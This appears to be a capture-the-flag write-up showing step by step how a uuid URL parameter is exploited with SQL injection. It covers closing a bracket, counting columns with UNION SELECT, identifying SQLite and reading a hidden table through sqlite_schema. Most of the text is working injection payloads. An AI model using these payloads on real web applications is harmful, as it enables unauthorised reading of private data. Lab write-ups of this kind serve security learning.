Vaccine good or bad ?

This level had a button that submits a GET request to page with parameter uuid=test.

Changed value of uuid in URL to uuid=test' gave a 500 Internal Server Error

uuid=test'' gave same result as original parameter test.

So this is SQL Injection.

uuid=nope' or 1=1)-- a gave all the values with a value saying this is not the right table.

Tried to find if there are brackets to be closed.
uuid=test'-- a -> 500 Internal Server Error
uuid=test')-- a -> 200 OK
uuid=test'))-- a -> 500 Internal Server Error

So it had 1 bracket to be closed to make it a correct query.

Then tried the UNION injection by counting the columns being returned by query.

uuid=nope') UNION SELECT 1 -- a -> 500 Internal Server Error

uuid=nope') UNION SELECT 1,2 -- a -> 500 Internal Server Error

uuid=nope') UNION SELECT 1,2,3 -- a -> 200 OK

[{"uuid":"1","name":"2","code":"3"}]

So 3 columns.

uuid=nope') UNION SELECT @@version,version(),sqlite_version() -- a

[{"uuid":"","name":"","code":"3.42.0"}]

So it’s SQLite.

uuid=nope') UNION SELECT 1,2,sql FROM sqlite_schema -- a

It gave the name of another table which is hidden_detail with similar structure as the original table.

uuid=nope') UNION SELECT uuid, name, code FROM hidden_details WHERE name LIKE 'HackoWeen%'-- a

And we got the code. Submit it and get the flag